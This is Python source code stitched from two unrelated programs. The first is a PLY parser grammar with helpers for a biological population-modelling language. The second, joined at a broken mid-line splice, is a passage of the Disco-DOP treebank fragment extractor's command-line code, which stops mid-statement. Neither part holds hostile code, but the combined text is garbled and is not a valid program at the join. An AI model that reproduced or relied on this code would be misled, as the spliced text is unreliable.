p[1] + ' + ' + p[3]\n elif p[2] == '-':\n p[0] = p[1] + ' - ' + p[3]\n\ndef p_expression_term(p):\n 'expression : term'\n p[0] = p[1]\n\ndef p_term_times(p):\n 'term : term TIMES factor'\n p[0] = p[1] + ' * ' + p[3]\n\ndef p_term_divides(p):\n 'term : term DIVIDE factor'\n p[0] = p[1] + ' / ' + p[3]\n\ndef p_term_factor(p):\n 'term : factor'\n p[0] = p[1]\n \ndef p_factor(p):\n '''factor : NUMBER\n | IDENTIFIER'''\n p[0] = ' ' + p[1] + ' '\n\ndef p_factor2(p):\n 'factor : MINUS NUMBER'\n p[0] = ' ' + p[1] + p[2] + ' '\n \n\ndef p_factor_expr(p):\n 'factor : LEFTBRACKET expression RIGHTBRACKET'\n p[0] = p[1] + ' ' + p[2] + ' ' + p[3]\n\n#For Heaviside step function,fMA and exp\ndef p_factor_h(p):\n 'factor : IDENTIFIER LEFTBRACKET expression RIGHTBRACKET'\n p[0] = p[1] + p[2] + p[3] + p[4]\n\n##def p_expression_power1(p):\n## 'expression : expression POWER term'\n## p[0] = p[1] + p[2] + p[3]\n\n#biospecies behaviour rules\ndef p_biospeciesbehaviours_1(p):\n 'biospeciesbehaviours : biospeciesbehaviours biospeciesbehaviour'\n p[0] = p[1] + p[2]\n\ndef p_biospeciesbehaviours_2(p):\n 'biospeciesbehaviours : biospeciesbehaviour'\n p[0] = p[1]\n\ndef p_biospeciesbehaviour(p):\n 'biospeciesbehaviour : IDENTIFIER EQUALS bioactions SEMICOLON'\n addtoactiondictionararies(p)\n p[0] = addorganismidtospecies(p)\n\ndef p_bioactions_1(p):\n 'bioactions : bioactions PLUS bioaction'\n p[0] = p[1] + ' ' + p[2] + ' ' + p[3]\n\ndef p_bioactions_2(p):\n 'bioactions : bioaction'\n p[0] = p[1]\n\ndef p_bioaction_1(p):\n 'bioaction : IDENTIFIER baction'\n p[0] = p[1] + ' ' + p[2]\n\ndef p_bioaction_2(p):\n 'bioaction : LEFTBRACKET IDENTIFIER COMMA NUMBER RIGHTBRACKET baction'\n p[0] = p[1] + ' ' + p[2] + ' ' + p[3] + ' ' + p[4] + p[5]+ ' ' + p[6]\n\ndef p_baction(p):\n '''baction : BIOPRODUCT\n | BIOREACTANT\n | BIOMODIFIER\n | BIOACTIVATOR\n | BIOINHIBITOR '''\n p[0] = p[1]\n\n#organism\ndef p_organisms_1(p):\n 'organisms : organisms organism'\n #Add sync between different species organisms\n p[0] = p[1] + '<*> ' + p[2]\n \n \ndef p_organisms_2(p):\n 'organisms : organism'\n p[0] = p[1]\n\ndef p_organism(p):\n 'organism : IDENTIFIER EQUALS biospeciesmodelcomponent'\n addtoorgspeciesdictionary(p)\n p[0] = makemodelcomponent(p)\n\ndef p_biospeciesmodelcomponent_1(p):\n 'biospeciesmodelcomponent : biospeciesmodelcomponent biosync bioinitial'\n p[0] = p[1] + ' ' + p[2] + ' ' + p[3] \ndef p_biospeciesmodelcomponent_2(p):\n 'biospeciesmodelcomponent : bioinitial'\n p[0] = ' ' + p[1] + ' '\n\ndef p_bioinitial(p):\n 'bioinitial : IDENTIFIER LEFTSQUAREBRACKET NUMBER RIGHTSQUAREBRACKET'\n p[0] = p[1] + ' ' + p[2] + p[3] + p[4] \n\ndef p_biosync(p):\n '''biosync : LEFTANGLEBRACKET TIMES RIGHTANGLEBRACKET\n | LEFTANGLEBRACKET listofids RIGHTANGLEBRACKET '''\n p[0] = p[1] + p[2] + p[3]\n\n#population\ndef p_populations_1(p):\n 'populations : populations population'\n# p[0] = p[1] + p[2]\n createpopactionnamesdictionary()\n p[0] = addonandoffspecies()\n \ndef p_populations_2(p):\n 'populations : population'\n p[0] = p[1]\n \ndef p_population(p):\n 'population : populationid EQUALS popactions SEMICOLON'\n addtopopactiondictionary(p)\n p[0] = p[1] + ' ' + p[2] + ' ' + p[3] + ' ' + p[4] + '\\n'\n\n \n#Also used in modelcomponent rules\ndef p_populationid(p):\n 'populationid : IDENTIFIER LEFTDOUBLECURLYBRACKET IDENTIFIER RIGHTDOUBLECURLYBRACKET'\n p[0] = p[1] + ' ' + p[2] + ' '+ p[3] + ' ' + p[4]\n\ndef p_popactions_1(p):\n 'popactions : popactions PLUS popaction'\n p[0] = p[1] + ' ' + p[2] + ' ' + p[3]\n \ndef p_popactions_2(p):\n 'popactions : popaction'\n p[0] = p[1] \n\ndef p_popaction(p):\n 'popaction : IDENTIFIER paction'\n p[0] = p[1] + ' ' + p[2]\n \ndef p_paction(p):\n ''' paction : PALADDITION\n | PALDELETION\n | PALACTIVATOR '''\n p[0] = p[1]\n\n\n#population modelcomponent\ndef p_modelcomponent_1(p):\n ' modelcomponent : modelcomponent palsync popinitial'\n p[0] = p[1] + ' ' + p[2] + ' ' + p[3] + '\\n'\n\ndef p_modelcomponent_2(p):\n ' modelcomponent : popinitial'\n p[0] = p[1]\n\ndef p_popinitial_1(p):\n 'popinitial : populationid LEFTDOUBLESQUAREBRACKET NUMBER RIGHTDOUBLESQUAREBRACKET'\n p[0] = p[1] + p[2] + p[3] + p[4]\n global orginitial\n #get popid and split up string\n popid = p[1].split()\n i=1\n #Get the organism name\n for word in popid:\n if i==3 :\n #Add organism name key and initial value\n orginitial[word] = p[3]\n i = i +1\n \ndef p_palsync(p):\n 'palsync : LEFTCURLYBRACKET listofids RIGHTCURLYBRACKET'\n p[0] = p[1] + p[2] + p[3]\n\ndef p_listofids_1(p):\n 'listofids : listofids COMMA IDENTIFIER'\n p[0] = p[1] + p[2] + p[3]\n\ndef p_listofids_2(p):\n 'listofids : IDENTIFIER'\n p[0] = p[1]\n\n#Max population\ndef p_maxpoplist(p):\n 'maxpoplist : IDENTIFIER COLON listofmaxpops SEMICOLON'\n p[0] = p[1] + p[2] + p[3] + p[4] + '\\n'\n\ndef p_listofmaxpops_1(p):\n 'listofmaxpops : listofmaxpops COMMA popmax'\n p[0] = p[1] + p[2] + p[3]\n\ndef p_listofmaxpops_2(p):\n 'listofmaxpops : popmax'\n p[0] = p[1]\n\ndef p_popmax(p):\n 'popmax : IDENTIFIER LEFTDOUBLECURLYBRACKET IDENTIFIER RIGHTDOUBLECURLYBRACKET NUMBER'\n p[0] = p[1] + p[2] + p[3] + p[4] + ' ' + p[5]\n global orgmax\n orgmax[p[3]] = p[5]\n \n# Error rule for syntax errors\ndef p_error(p):\n if p:\n print(\"Syntax ERROR at token: \",\"Type: \", p.type,\"Value:\" , p.value ,\"LineNo: \", p.lineno)\n else:\n print(\"Syntax error at End Of File\")\n\n#Functions used in parser rules\n\n#Create initialresetdicitionary\ndef createorginitialresetdictionary(p):\n global orgspecies\n global orginitialresets\n\n internalspeciesname = p[2]\n species = []\n speciesreset = {}\n\n for orgid in orgspecies:\n species = orgspecies[orgid]\n if internalspeciesname in species:\n speciesreset[internalspeciesname] = p[4]\n if orgid in orginitialresets:\n orginitialresets[orgid].update(speciesreset)\n else:\n orginitialresets[orgid] = speciesreset\n \n\n#Add on and off species\ndef addonandoffspecies():\n global orgpopactionnames\n global orgmax\n\n noworgid = ''\n popactions = {}\n result = ''\n actionbefore = False\n \n\n for nowid in orgmax:\n \n popactions = orgpopactionnames[nowid]\n\n i=1\n while i < int(orgmax[nowid]) +1:\n onactions,offactions = '',''\n actionbefore=False\n \n for action in popactions:\n infolist=popactions[action]\n if 'async' in infolist:\n if infolist[1] == '<<<':\n #Check if an action of this type has been parsed already\n if onactions == '':\n onactions,offactions = createdeleteactions(i,nowid,action,actionbefore)\n else :\n on,off = createdeleteactions(i,nowid,action,actionbefore)\n onactions += on\n offactions += off\n if infolist[1] == '>>>':\n #Check if an action of this type has been parsed already\n if onactions == '':\n onactions,offactions = createaddactions(i,nowid,action,actionbefore)\n else :\n on,off = createaddactions(i,nowid,action,actionbefore)\n onactions += on\n offactions += off\n actionbefore=True\n if 'switch1' in infolist:\n #Check if an action of this type has been parsed already\n if onactions == '':\n onactions,offactions = createsyncdeleteactions(i,nowid,action,infolist[3],actionbefore)\n else :\n on,off = createsyncdeleteactions(i,nowid,action,infolist[3],actionbefore)\n onactions += on\n offactions += off\n actionbefore= True\n if 'switch2' in infolist:\n #Check if an action of this type has been parsed already\n if onactions == '':\n onactions,offactions = createsyncaddactions(i,nowid,action,infolist[3],actionbefore)\n else :\n on,off = createsyncaddactions(i,nowid,action,infolist[3],actionbefore)\n onactions += on\n offactions += off\n actionbefore= True\n if 'repro1' in infolist:\n #Check if an action of this type has been parsed already\n if onactions == '':\n onactions,offactions = createsyncaddactions(i,nowid,action,infolist[3],actionbefore)\n else :\n on,off = createsyncaddactions(i,nowid,action,infolist[3],actionbefore)\n onactions += on\n offactions += off\n actionbefore= True\n if 'repro2' in infolist:\n #Deal with this type of popaction in internal species actions\n pass\n \n result += 'On_' + nowid + str(i) + ' = ' + onactions+';' + '\\n'\n result += 'Off_' + nowid + str(i) + ' = ' + offactions +';' + '\\n'\n i = i+1\n\n result += '\\n'\n \n return result\n\n#Create delete actions for organism that has a popaction which deletes it\ndef createdeleteactions(number,organismid,action,actionbefore):\n global orgmax\n \n result1 = ''\n result2 = ''\n \n if actionbefore == False:\n result1 = action + '_' + organismid + str(number) + ' <<'\n result2 = action + '_' + organismid + str(number) + ' >>'\n else:\n result1 = ' + ' + action + '_' + organismid + str(number) + ' <<'\n result2 = ' + ' + action + '_' + organismid + str(number) + ' >>'\n \n return result1,result2\n\n#Create add actions for organism that has a popaction which adds it\ndef createaddactions(number,organismid,action,actionbefore):\n global orgmax\n \n result1 = ''\n result2 = ''\n \n if actionbefore == False:\n result1 = action + '_' + organismid + str(number) + ' >>'\n result2 = action + '_' + organismid + str(number) + ' <<'\n else:\n result1 = ' + ' + action + '_' + organismid + str(number) + ' >>'\n result2 = ' + ' + action + '_' + organismid + str(number) + ' <<'\n \n return result1,result2 \n\n#Create sync delete actions for organism that has a popaction which deletes it\ndef createsyncdeleteactions(number,organismid,action,otherorgid,actionbefore):\n global orgmax\n \n result1 = ''\n result2 = ''\n\n #Find max value for other organism\n otherorgmax = orgmax[otherorgid]\n i = 1\n while i < int(otherorgmax) + 1:\n if actionbefore == False:\n result1 = action + '_' + organismid + str(number) + '_' + otherorgid + str(i) + ' <<'\n result2 = action + '_' + organismid + str(number) + '_' + otherorgid + str(i) + ' >>'\n actionbefore = True\n else :\n result1 += ' + ' + action + '_' + organismid + str(number) + '_' + otherorgid + str(i) + ' <<'\n result2 += ' + ' + action + '_' + organismid + str(number) + '_' + otherorgid + str(i) + ' >>'\n i = i + 1\n \n return result1,result2\n\n#Create sync add actions for organism that has a popaction which adds a new organism\ndef createsyncaddactions(number,organismid,action,otherorgid,actionbefore):\n global orgmax\n \n result1 = ''\n result2 = ''\n\n #Find max value for other organism\n otherorgmax = orgmax[otherorgid]\n i = 1\n while i < int(otherorgmax) + 1:\n if actionbefore == False:\n result1 = action + '_' + otherorgid + str(i) + '_' + organismid + str(number) + ' >>'\n result2 = action + '_' + otherorgid + str(i) + '_' + organismid + str(number) + ' <<'\n actionbefore = True\n else :\n result1 += ' + ' + action + '_' + otherorgid + str(i) + '_' + organismid + str(number) + ' >>'\n result2 += ' + ' + action + '_' + otherorgid + str(i) + '_' + organismid + str(number) + ' <<'\n i = i + 1\n \n return result1,result2\n\n#For internal species pop actions\n#Create sync add actions for organism that has a popaction which adds a new organism\ndef createsyncadd2actions(number,organismid,action,otherorgid,actionbefore):\n global orgmax\n \n result1 = ''\n result2 = ''\n\n #Find max value for other organism\n otherorgmax = orgmax[otherorgid]\n i = 1\n while i < int(otherorgmax) + 1:\n if actionbefore == False:\n result1 = action + '_' + organismid + str(number) + '_' + otherorgid + str(i) + ' >>'\n result2 = action + '_' + organismid + str(number) + '_' + otherorgid + str(i) + ' <<'\n actionbefore = True\n else :\n result1 += ' + ' + action + '_' + organismid + str(number) + '_' + otherorgid + str(i) + ' >>'\n result2 += ' + ' + action + '_' + organismid + str(number) + '_' + otherorgid + str(i) + ' <<'\n i = i + 1\n \n return result1,result2\n\n#Add entry to popactionsdictionary\ndef addtopopactiondictionary(p):\n #Variables\n global orgpopactions\n \n #Split Popid\n popid = p[1].split()\n #Get organism id from popid\n orgid = popid[2]\n\n #split the popactions into separate words\n popacts = p[3].split()\n\n #Add orgid and popactions to dictionary\n orgpopactions[orgid] = makeactionoperatordictionary(popacts)\n\n#Create dictionary of actions and their associated operator\ndef makeactionoperatordictionary(popacts):\n popactions = {}\n actionname=''\n\n for word in popacts:\n if '+' == word:\n pass\n if '(' in word or ')' in word or '>' in word or '<' in word:\n popactions[actionname] = word\n else :\n actionname = word\n \n return popactions\n\n#Create popactionnames dictionary\ndef createpopactionnamesdictionary():\n global orgpopactions\n global orgpopactionnames\n\n \n for nowid in orgmax:\n #Get organism id from popid\n noworgid = nowid\n popactions = orgpopactions[noworgid]\n \n #Make a dictionary of key actionid and values operators for now organism id\n #All the actions that are associated with the now organism population and all the operators associated with that action\n orgsameactions = {}\n for orgid in orgpopactions:\n acts = orgpopactions[orgid]\n for action in acts:\n if action in orgsameactions:\n orgsameactions[action].append(acts[action])\n else:\n orgsameactions[action] = [acts[action]]\n\n for act in popactions:\n if act in orgsameactions:\n #Find if the action is shared with other population\n if len(orgsameactions[act]) < 2:\n #This is pop action that is not synchronised with other population\n makeandaddactiontypedictionary(noworgid,act,'async',orgsameactions[act][0],'none')\n else :\n i = 0\n while i < len(orgsameactions[act]):\n #Find the action and operator associated with now organism population\n if orgsameactions[act][i] == popactions[act]:\n sameaction = act\n sameoperator = orgsameactions[act][i]\n else:#Find the operator associated with other organism population\n differentoperator = orgsameactions[act][i]\n i = i+1\n #Find out what kind of action is synchronised by what type of operators\n #Switch action now organism population decrease other organism population increase\n if sameoperator == '<<<' and differentoperator == '>>>':\n makeandaddactiontypedictionary(noworgid,act,'switch1',sameoperator,differentoperator)\n #Switch action now organism population increase other population decrease\n if sameoperator == '>>>' and differentoperator == '<<<':\n makeandaddactiontypedictionary(noworgid,act,'switch2',sameoperator,differentoperator)\n #Reproduction action now organism population increase other population stays the same\n if sameoperator == '>>>' and differentoperator == '((+))':\n makeandaddactiontypedictionary(noworgid,act,'repro1',sameoperator,differentoperator)\n #Reproduction action now organism population stays the same other population increases\n if sameoperator == '((+))' and differentoperator == '>>>':\n makeandaddactiontypedictionary(noworgid,act,'repro2',sameoperator,differentoperator)\n\n\n#Create dictionary of action and their associated type and add to orgpopactionnames dictionary\ndef makeandaddactiontypedictionary(orgid,actionname,actiontype,sameoperator,differentoperator):\n global orgpopactionnames\n otherorgid=''\n\n #Find other organisms id\n for key in orgpopactions:\n if actionname in orgpopactions[key]:\n if key == orgid:\n pass\n else:\n otherorgid = key\n \n #If action is type async it will not have a different operator or another organism associated with it\n if actiontype == 'async':\n actioninfolist=[actiontype,sameoperator]\n else:\n actioninfolist=[actiontype,sameoperator,differentoperator,otherorgid]\n \n actiontype = {actionname:actioninfolist}\n if orgid in orgpopactionnames:\n orgpopactionnames[orgid].update(actiontype)\n else:\n orgpopactionnames[orgid] = actiontype\n\n\n \n#Add and sometimes multiply parameters based on max value for organism.\n#Add parameter to orgparameter dictionary only if they are associated to an organism.\n#Multiply parameters based on if there are species ids in their expression. \ndef addorganismidtoparameters(p):\n #Variables\n addorgid, orgid = isspeciesinparameter(p)\n global orgmax\n global orgparameters\n right = ''\n\n if addorgid == False:\n right = p[1] + ' ' + p[2] + p[3] + p[4] + '\\n' + '\\n'\n\n if addorgid == True:\n #Add parameter to more than one orgid if needed\n ids = orgid.split()\n\n a = 0\n while a ... [options]'''\nFLAGS = ('approx', 'indices', 'nofreq', 'complete', 'alt',\n\t\t'relfreq', 'adjacent', 'debin', 'debug', 'quiet', 'help')\nOPTIONS = ('fmt=', 'numproc=', 'numtrees=', 'encoding=', 'batch=', 'cover=',\n\t\t'twoterms=')\nPARAMS = {}\nFRONTIERRE = re.compile(r'\\(([^ ()]+) \\)') # for altrepr()\nTERMRE = re.compile(r'\\(([^ ()]+) ([^ ()]+)\\)') # for altrepr()\n\n\ndef main(argv=None):\n\t\"\"\"Command line interface to fragment extraction.\"\"\"\n\tif argv is None:\n\t\targv = sys.argv[2:]\n\ttry:\n\t\topts, args = gnu_getopt(argv, 'ho:', FLAGS + OPTIONS)\n\texcept GetoptError as err:\n\t\tprint('error:', err, file=sys.stderr)\n\t\tprint(SHORTUSAGE)\n\t\tsys.exit(2)\n\topts = dict(opts)\n\n\tfor flag in FLAGS:\n\t\tPARAMS[flag] = '--' + flag in opts\n\tPARAMS['disc'] = opts.get('--fmt', 'bracket') != 'bracket'\n\tPARAMS['fmt'] = opts.get('--fmt', 'bracket')\n\tnumproc = int(opts.get('--numproc', 1))\n\tif numproc == 0:\n\t\tnumproc = cpu_count()\n\tif not numproc:\n\t\traise ValueError('numproc should be an integer > 0. got: %r' % numproc)\n\tlimit = int(opts.get('--numtrees', 0)) or None\n\tPARAMS['cover'] = None\n\tif '--cover' in opts and ',' in opts['--cover']:\n\t\ta, b = opts['--cover'].split(',')\n\t\tPARAMS['cover'] = int(a), int(b)\n\telif '--cover' in opts:\n\t\tPARAMS['cover'] = int(opts.get('--cover', 0)), 999\n\tPARAMS['twoterms'] = opts.get('--twoterms')\n\tencoding = opts.get('--encoding', 'utf8')\n\tbatchdir = opts.get('--batch')\n\n\tif len(args) < 1:\n\t\tprint('missing treebank argument')\n\tif batchdir is None and len(args) not in (1, 2):\n\t\tprint('incorrect number of arguments:', args, file=sys.stderr)\n\t\tprint(SHORTUSAGE)\n\t\tsys.exit(2)\n\tif batchdir:\n\t\tif numproc != 1:\n\t\t\traise ValueError('Batch mode only supported in single-process '\n\t\t\t\t'mode. Use the xargs command for multi-processing.')\n\treadstdin = None\n\tfor n, fname in enumerate(args):\n\t\tif fname == '-':\n\t\t\tif numproc != 1:\n\t\t\t\t# write to temp file so that contents can be read\n\t\t\t\t# in multiple processes\n\t\t\t\tif readstdin is not None:\n\t\t\t\t\traise ValueError('can only read from stdin once.')\n\t\t\t\twith tempfile.NamedTemporaryFile(delete=False) as tmp:\n\t\t\t\t\ttmp.write(open(sys.stdin.fileno(), 'rb').read())\n\t\t\t\t\targs[n] = tmp.name\n\t\t\t\treadstdin = n\n\t\telif not os.path.exists(fname):\n\t\t\traise ValueError('not found: %r' % fname)\n\tif PARAMS['complete']:\n\t\tif len(args) < 2:\n\t\t\traise ValueError('need at least two treebanks with --complete.')\n\t\tif PARAMS['twoterms'] or PARAMS['adjacent']:\n\t\t\traise ValueError('--twoterms and --adjacent are incompatible '\n\t\t\t\t\t'with --complete.')\n\t\tif PARAMS['approx'] or PARAMS['nofreq']:\n\t\t\traise ValueError('--complete is incompatible with --nofreq '\n\t\t\t\t\t'and --approx')\n\n\tlevel = logging.WARNING if PARAMS['quiet'] else logging.DEBUG\n\tlogging.basicConfig(level=level, format='%(message)s')\n\tif PARAMS['debug'] and numproc > 1:\n\t\tlogger = multiprocessing.log_to_stderr()\n\t\tlogger.setLevel(multiprocessing.SUBDEBUG)\n\n\tlogging.info('Disco-DOP Fragment Extractor')\n\n\tlogging.info('parameters:\\n%s', '\\n'.join(' %s:\\t%r' % kv\n\t\tfor kv in sorted(PARAMS.items())))\n\tlogging.info('\\n'.join('treebank%d: %s' % (n + 1, a)\n\t\tfor n, a in enumerate(args)))\n\n\tif numproc == 1 and batchdir:\n\t\tbatch(batchdir, args, limit, encoding, '--debin' in opts)\n\telse:\n\t\tfragmentkeys, counts = regular(args, numproc, limit, encoding)\n\t\tout = (io.open(opts['-o'], 'w', encoding=encoding)\n\t\t\t\tif '-o' in opts else None)\n\t\tif '--debin' in opts:\n\t\t\tfragmentkeys = debinarize(fragmentkeys)\n\t\tprintfragments(fragmentkeys, counts, out=out)\n\tif readstdin is not None:\n\t\tos.unlink(args[readstdin])\n\n\ndef regular(filenames, numproc, limit, encoding):\n\t\"\"\"non-batch processing. multiprocessing optional.\"\"\"\n\tmult = 1\n\tif PARAMS['approx']:\n\t\tfragments = defaultdict(int)\n\telse:\n\t\tfragments = {}\n\t# detect corpus reading errors in this process (e.g., wrong encoding)\n\tinitworker(\n\t\t\tfilenames[0],\n\t\t\tfilenames[1] if len(filenames) == 2 else None,\n\t\t\tlimit, encoding)\n\tif numproc == 1:\n\t\tmymap, myworker = map, worker\n\telse: # multiprocessing, start worker processes\n\t\tpool = multiprocessing.Pool(\n\t\t\t\tprocesses=numproc, initializer=initworker,\n\t\t\t\tinitargs=(filenames[0], filenames[1] if len(filenames) == 2\n\t\t\t\t\telse None, limit, encoding))\n\t\tmymap, myworker = pool.imap, mpworker\n\tnumtrees = (PARAMS['trees1'].len if limit is None\n\t\t\telse min(PARAMS['trees1'].len, limit))\n\n\tif PARAMS['complete']:\n\t\ttrees1, trees2 = PARAMS['trees1'], PARAMS['trees2']\n\t\tfragmentkeys, bitsets = _fragments.completebitsets(\n\t\t\t\ttrees1, PARAMS['vocab'],\n\t\t\t\tmax(trees1.maxnodes, trees2.maxnodes), PARAMS['disc'])\n\telse:\n\t\tif len(filenames) == 1:\n\t\t\twork = workload(numtrees, mult, numproc)\n\t\telse:\n\t\t\tchunk = numtrees // (mult * numproc) + 1\n\t\t\twork = [(a, a + chunk) for a in range(0, numtrees, chunk)]\n\t\tif numproc != 1:\n\t\t\tlogging.info('work division:\\n%s', '\\n'.join(' %s:\\t%r' % kv\n\t\t\t\tfor kv in sorted(dict(numchunks=len(work), mult=mult).items())))\n\t\tdowork = mymap(myworker, work)\n\t\tfor results in dowork:\n\t\t\tif PARAMS['approx']:\n\t\t\t\tfor frag, x in results.items():\n\t\t\t\t\tfragments[frag] += x\n\t\t\telse:\n\t\t\t\tfragments.update(results)\n\t\tfragmentkeys = list(fragments)\n\t\tbitsets = [fragments[a] for a in fragmentkeys]\n\tif PARAMS['nofreq']:\n\t\tcounts = None\n\telif PARAMS['approx']:\n\t\tcounts = [fragments[a] for a in fragmentkeys]\n\telse:\n\t\ttask = 'indices' if PARAMS['indices'] else 'counts'\n\t\tlogging.info('dividing work for exact %s', task)\n\t\tcountchunk = len(bitsets) // numproc + 1\n\t\twork = list(range(0, len(bitsets), countchunk))\n\t\twork = [(n, len(work), bitsets[a:a + countchunk])\n\t\t\t\tfor n, a in enumerate(work)]\n\t\tcounts = []\n\t\tlogging.info('getting exact %s', task)\n\t\tfor a in mymap(\n\t\t\t\texactcountworker if numproc == 1 else mpexactcountworker, work):\n\t\t\tcounts.extend(a)\n\tif PARAMS['cover']:\n\t\tmaxdepth, maxfrontier = PARAMS['cover']\n\t\tbefore = len(fragmentkeys)\n\t\tcover = _fragments.allfragments(PARAMS['trees1'], PARAMS['vocab'],\n\t\t\t\tmaxdepth, maxfrontier, PARAMS['disc'], PARAMS['indices'])\n\t\tfor a in cover:\n\t\t\tif a not in fragments:\n\t\t\t\tfragmentkeys.append(a)\n\t\t\t\tcounts.append(cover[a])\n\t\tlogging.info('merged %d cover fragments '\n\t\t\t\t'up to depth %d with max %d frontier non-terminals.',\n\t\t\t\tlen(fragmentkeys) - before, maxdepth, maxfrontier)\n\tif numproc != 1:\n\t\tpool.close()\n\t\tpool.join()\n\t\tdel dowork, pool\n\treturn fragmentkeys, counts\n\n\ndef batch(outputdir, filenames, limit, encoding, debin):\n\t\"\"\"batch processing: three or more treebanks specified.\n\n\tCompares the first treebank to all others, and writes the results\n\tto ``outputdir/A_B`` where ``A`` and ``B`` are the respective filenames.\n\tCounts/indices are from the other (B) treebanks.\n\tThere are at least 2 use cases for this:\n\n\t1. Comparing one treebank to a series of others. The first treebank will\n\t\tonly be loaded once.\n\t2. In combination with ``--complete``, the first treebank is a set of\n\t\tfragments used as queries on the other treebanks specified.\"\"\"\n\tinitworker(filenames[0], None, limit, encoding)\n\ttrees1 = PARAMS['trees1']\n\tmaxnodes = trees1.maxnodes\n\tif PARAMS['complete']:\n\t\tfragmentkeys, bitsets = _fragments.completebitsets(\n\t\t\t\ttrees1, PARAMS['vocab'],\n\t\t\t\tmaxnodes, PARAMS['disc'])\n\t\tfragments = True\n\telif PARAMS['approx']:\n\t\tfragments = defaultdict(int)\n\telse:\n\t\tfragments = {}\n\tfor filename in filenames[1:]:\n\t\tPARAMS.update(read2ndtreebank(filename, PARAMS['vocab'],\n\t\t\tPARAMS['fmt'], limit, encoding))\n\t\ttrees2 = PARAMS['trees2']\n\t\tif not PARAMS['complete']:\n\t\t\tfragments = _fragments.extractfragments(trees1, 0, 0,\n\t\t\t\t\tPARAMS['vocab'], trees2, disc=PARAMS['disc'],\n\t\t\t\t\tdebug=PARAMS['debug'], approx=PARAMS['approx'],\n\t\t\t\t\ttwoterms=PARAMS['twoterms'], adjacent=PARAMS['adjacent'])\n\t\t\tfragmentkeys = list(fragments)\n\t\t\tbitsets = [fragments[a] for a in fragmentkeys]\n\t\t\tmaxnodes = max(trees1.maxnodes, trees2.maxnodes)\n\t\tcounts = None\n\t\tif PARAMS['approx'] or not fragments:\n\t\t\tcounts = fragments.values()\n\t\telif not PARAMS['nofreq']:\n\t\t\tlogging.info('getting %s for %d fragments',\n\t\t\t\t\t'indices of occurrence' if PARAMS['indices']\n\t\t\t\t\telse 'exact counts', len(bitsets))\n\t\t\tcounts = _fragments.exactcounts(bitsets, trees1, trees2,\n\t\t\t\t\tindices=PARAMS['indices'],\n\t\t\t\t\tmaxnodes=maxnodes)\n\t\toutputfilename = '%s/%s_%s' % (outputdir,\n\t\t\t\tos.path.basename(filenames[0]), os.path.basename(filename))\n\t\tout = io.open(outputfilename, 'w', encoding=encoding)\n\t\tif debin:\n\t\t\tfragmentkeys = debinarize(fragmentkeys)\n\t\tprintfragments(fragmentkeys, counts, out=out)\n\t\tlogging.info('wrote to %s', outputfilename)\n\n\ndef readtreebanks(filename1, filename2=None, fmt='bracket',\n\t\tlimit=None, encoding='utf8'):\n\t\"\"\"Read one or two treebanks.\"\"\"\n\tvocab = Vocabulary()\n\ttrees1 = _fragments.readtreebank(filename1, vocab,\n\t\t\tfmt, limit, encoding)\n\ttrees2 = _fragments.readtreebank(filename2, vocab,\n\t\t\tfmt, limit, encoding)\n\ttrees1.indextrees(vocab)\n\tif trees2:\n\t\ttrees2.indextrees(vocab)\n\treturn dict(trees1=trees1, trees2=trees2, vocab=vocab)\n\n\ndef read2ndtreebank(filename2, vocab, fmt='bracket',\n\t\tlimit=None, encoding='utf8'):\n\t\"\"\"Read a second treebank.\"\"\"\n\ttrees2 = _fragments.readtreebank(filename2, vocab,\n\t\t\tfmt, limit, encoding)\n\ttrees2.indextrees(vocab)\n\tlogging.info('%r: %d trees; %d nodes (max %d); '\n\t\t\t'word tokens: %d\\n%r',\n\t\t\tfilename2, len(trees2), trees2.numnodes, trees2.maxnodes,\n\t\t\ttrees2.numwords, PARAMS['vocab'])\n\treturn dict(trees2=trees2, vocab=vocab)\n\n\ndef initworker(filename1, filename2, limit, encoding):\n\t\"\"\"Read treebanks for this worker.\n\n\tWe do this separately for each process under the assumption that this is\n\tadvantageous with a NUMA architecture.\"\"\"\n\tPARAMS.update(readtreebanks(filename1, filename2,\n\t\t\tlimit=limit, fmt=PARAMS['fmt'], encoding=encoding))\n\ttrees1 = PARAMS['trees1']\n\tif PARAMS['debug']:\n\t\tprint('\\nproductions:')\n\t\tfor a, b in sorted([(PARAMS['vocab'].prodrepr(n), n)\n\t\t\t\tfor n in range(len(PARAMS['vocab'].prods))],\n\t\t\t\tkey=lambda x: x[1]):\n\t\t\tprint('%d. %s' % (b, a))\n\t\tprint('treebank 1:')\n\t\tfor n in range(trees1.len):\n\t\t\ttrees1.printrepr(n, PARAMS['vocab'])\n\tif not trees1:\n\t\traise ValueError('treebank1 empty.')\n\tm = 'treebank1: %d trees; %d nodes (max: %d); %d word tokens.\\n' % (\n\t\t\ttrees1.len, trees1.numnodes, trees1.maxnodes, trees1.numwords)\n\tif filename2:\n\t\ttrees2 = PARAMS['trees2']\n\t\tif PARAMS['debug']:\n\t\t\tprint('treebank 2:')\n\t\t\tfor n in range(trees2.len):\n\t\t\t\ttrees2.printrepr(n, PARAMS['vocab'])\n\t\tif not trees2:\n\t\t\traise ValueError('treebank2 empty.')\n\t\tm += 'treebank2: %d trees; %d nodes (max %d); %d word tokens.\\n' % (\n\t\t\t\ttrees2.len, trees2.numnodes, trees2.maxnodes, trees2.numwords)\n\tlogging.info('%s%r', m, PARAMS['vocab'])\n\n\ndef initworkersimple(trees, sents, trees2=None, sents2=None):\n\t\"\"\"Initialization for a worker in which a treebank was already loaded.\"\"\"\n\tPARAMS.update(_fragments.getctrees(zip(trees, sents),\n\t\t\tNone if trees2 is None else zip(trees2, sents2)))\n\tassert PARAMS['trees1'], PARAMS['trees1']\n\n\n@workerfunc\ndef mpworker(interval):\n\t\"\"\"Worker function for fragment extraction (multiprocessing wrapper).\"\"\"\n\treturn worker(interval)\n\n\ndef worker(interval):\n\t\"\"\"Worker function for fragment extraction.\"\"\"\n\toffset, end = interval\n\ttrees1 = PARAMS['trees1']\n\ttrees2 = PARAMS['trees2']\n\tassert offset < trees1.len\n\tresult = {}\n\tresult = _fragments.extractfragments(trees1, offset, end,\n\t\t\tPARAMS['vocab'], trees2, approx=PARAMS['approx'],\n\t\t\tdisc=PARAMS['disc'],\n\t\t\tdebug=PARAMS['debug'], twoterms=PARAMS['twoterms'],\n\t\t\tadjacent=PARAMS['adjacent'])\n\tlogging.debug('finished %d--%d', offset, end)\n\treturn result\n\n\n@workerfunc\ndef mpexactcountworker(args):\n\t\"\"\"Worker function for counts (multiprocessing wrapper).\"\"\"\n\treturn exactcountworker(args)\n\n\ndef exactcountworker(args):\n\t\"\"\"Worker function for counting of fragments.\"\"\"\n\tn, m, bitsets = args\n\ttrees1 = PARAMS['trees1']\n\tif PARAMS['complete']:\n\t\tresults = 